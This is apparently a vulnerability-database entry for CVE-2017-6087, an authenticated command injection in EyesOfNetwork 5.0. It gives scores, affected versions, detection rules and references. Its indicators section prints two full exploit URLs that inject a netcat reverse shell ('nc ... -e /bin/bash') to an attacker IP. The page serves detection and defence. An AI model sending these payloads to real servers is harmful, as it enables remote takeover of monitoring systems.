CVE-2017-6087
published 2017-03-24CVE-2017-6087: EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter…
PriorityP262high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
7.18%
93.5th percentile
EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter in the (1) acknowledge, (2) delete, or (3) ownDisown function in module/monitoring_ged/ged_functions.php or the (4) module parameter to module/index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eonweb_project | eonweb | <= 5.0-0 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;↗
urlhttps://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding↗
- →Detect shell metacharacter injection in the selected_events[] parameter on ged_actions.php — look for semicolons, pipes, or backticks in the selected_events[] query/POST parameter. ↗
- →Detect shell metacharacter injection in the module parameter to module/index.php — look for pipe (|), semicolon (;), or backtick characters in the module GET parameter. ↗
- →Alert on HTTP requests to /module/monitoring_ged/ged_actions.php containing URL-encoded shell metacharacters (%3B, %7C, %60) within the selected_events[] parameter. ↗
- →Alert on HTTP requests to /module/index.php where the module parameter contains a pipe character (| or %7C) followed by a command string, indicating OS command injection. ↗
- →Monitor for outbound netcat (nc) connections with the -e /bin/bash flag originating from the EON web server process, indicating successful reverse shell execution. ↗
- →The vulnerable sink is shell_exec() in module/monitoring_ged/ged_functions.php (line 373) and exec() in module/index.php (line 24); monitor process spawning from the web server (e.g., apache/httpd spawning nc, bash, or sh). ↗
- ·The exploit requires prior authentication; unauthenticated access alone is insufficient to trigger RCE. Detection rules should account for authenticated sessions preceding the malicious request. ↗
- ·The PoC IPs (10.0.5.124, 192.168.1.14) and port (1337) are attacker-controlled and will vary in real attacks; do not rely solely on these specific values for detection. ↗
- ·The vulnerability is fixed in EON version 5.1; systems running 5.0 or earlier are affected. Verify the installed version before applying detection resources. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://www.openwall.com/lists/oss-security/2017/03/23/5http://www.securityfocus.com/bid/97109https://github.com/EyesOfNetworkCommunity/eonweb/commit/196729cc045ef93ceeddd1de505a1de8f9cdf74dhttps://sysdream.com/news/lab/2017-03-14-cve-2017-6087-eon-5-0-remote-code-execution/https://www.exploit-db.com/exploits/41746/http://www.openwall.com/lists/oss-security/2017/03/23/5http://www.securityfocus.com/bid/97109https://github.com/EyesOfNetworkCommunity/eonweb/commit/196729cc045ef93ceeddd1de505a1de8f9cdf74dhttps://sysdream.com/news/lab/2017-03-14-cve-2017-6087-eon-5-0-remote-code-execution/https://www.exploit-db.com/exploits/41746/
2017-03-24
Published